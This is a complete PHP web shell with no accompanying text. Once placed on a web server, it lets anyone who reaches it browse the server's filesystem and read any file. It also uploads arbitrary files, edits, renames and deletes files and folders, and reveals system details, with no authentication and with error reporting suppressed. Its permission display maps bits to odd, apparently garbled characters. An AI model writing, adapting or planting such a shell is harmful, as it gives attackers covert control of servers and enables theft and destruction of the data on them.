<?php header('X-XSS-Protection:0');ob_start();set_time_limit(0);error_reporting(0);ini_set('display_errors',0);
$p=str_replace('\\','/',$_GET['j']??getcwd());$a=explode('/',$p);echo '<center><table width="100%"><tr><td>'.php_uname().'</td></tr></table>';
foreach($a as $i=>$d)if($d==''&&!$i)echo'<a href="?j=/">/</a>';elseif($d!=''){echo'<a href="?j=';for($k=0;$k<=$i;$k++){echo$a[$k];if($k!=$i)echo'/';}echo"\">$d</a>/";}
echo'<br><form enctype="multipart/form-data" method=POST><input type=file name=f required><input type=submit value=U></form>';
if($_FILES['f'])echo copy($_FILES['f']['tmp_name'],$p.'/'.$_FILES['f']['name'])?'<font color=green>OK</font>':'<script>alert("NO")</script>';
if(isset($_GET['filesrc'])){$f=$_GET['filesrc'];echo"<br><textarea style='width:100%;height:1200px;font-size:8px' readonly>".htmlspecialchars(file_get_contents($f))."</textarea>";}
elseif(isset($_GET['option'])&&$_POST['opt']!='delete'){
echo'<center>'.$_POST['j'];$cwd=getcwd();
if($_GET['opt']=='btw')echo"<form action='?option&j=$cwd&opt=delete&type=buat' method=POST><input name=name size=25 value=Folder><input type=hidden name=j value='$cwd'><input type=hidden name=opt value=delete><input type=submit value='>>'></form>";
elseif($_POST['opt']=='rename'){if(isset($_POST['newname']))echo rename($_POST['j'],$p.'/'.$_POST['newname'])?'<font color=green>OK</font>':'<script>alert("NO")</script>';echo"<form method=POST><input name=newname value='".($_POST['newname']??$_POST['name'])."'><input type=hidden name=j value='{$_POST['j']}'><input type=hidden name=opt value=rename><input type=submit value='>>'></form>";}
elseif($_POST['opt']=='edit'){if(isset($_POST['src'])){$h=fopen($_POST['j'],'w');echo fwrite($h,$_POST['src'])?'<font color=green>OK</font>':'<script>alert("NO")</script>';fclose($h);}echo"<form method=POST><textarea style='width:100%;height:1000px;font-size:8px' name=src>".htmlspecialchars(file_get_contents($_POST['j']))."</textarea><input type=hidden name=j value='{$_POST['j']}'><input type=hidden name=opt value=edit><input type=submit value='>>'></form>";}
echo'</center>';
}elseif(isset($_GET['option'])&&$_POST['opt']=='delete'){if($_POST['type']=='g')echo rmdir($_POST['j'])?'<font color=green>OK</font>':'<script>alert("NO")</script>';elseif($_POST['type']=='file')echo unlink($_POST['j'])?'<font color=green>OK</font>':'<script>alert("NO")</script>';}
echo'<table width="95%" align=center>';foreach(scandir($p)as $f){if(is_dir("$p/$f")&&!in_array($f,['.','..'])){echo"<tr><td>D<a href='?j=$p/$f'> $f</a><td><center>D</center><td><center>".($w=perms("$p/$f"))."</center><td><form method=POST action='?option&j=$p'><select name=opt><option>+<option value=delete>Delete<option value=rename>Rename</select><input type=hidden name=type value=g><input type=hidden name=j value='$p/$f'><input type=submit value='>'></form></tr>";}}
foreach(scandir($p)as $f){if(is_file("$p/$f")){$s=round(filesize("$p/$f")/1024,3);$s=$s>=1024?round($s/1024,2).' MB':$s.' KB';echo"<tr><td>F<a href='?filesrc=$p/$f&j=$p'> $f</a><td><center>$s</center><td><center>".perms("$p/$f")."</center><td><form method=POST action='?option&j=$p'><select name=opt><option>+<option value=delete>Delete<option value=edit>Edit<option value=rename>Rename</select><input type=hidden name=type value=file><input type=hidden name=name value='$f'><input type=hidden name=j value='$p/$f'><input type=submit value='>'></form></tr>";}}
echo'</table></center>';function perms($f){$z=fileperms($f);$i=(($z&0xC000)==0xC000)?'s':((($z&0xA000)==0xA000)?'4':((($z&0x8000)==0x8000)?'0':((($z&0x6000)==0x6000||($z&0x4000)==0x4000)?'3':((($z&0x2000)==0x2000)?'c':((($z&0x1000)==0x1000)?'p':'5')))));$i.=(($z&0x0100)?'2':'0').(($z&0x0080)?'1':'0').(($z&0x0040)?(($z&0x0800)?'s':'6'):(($z&0x0800)?'S':'0')).(($z&0x0020)?'2':'0').(($z&0x0010)?'1':'0').(($z&0x0008)?(($z&0x0400)?'s':'6'):(($z&0x0400)?'S':'0')).(($z&0x0004)?'2':'0').(($z&0x0002)?'1':'0').(($z&0x0001)?(($z&0x0200)?'t':'6'):(($z&0x0200)?'T':'0'));return$i;}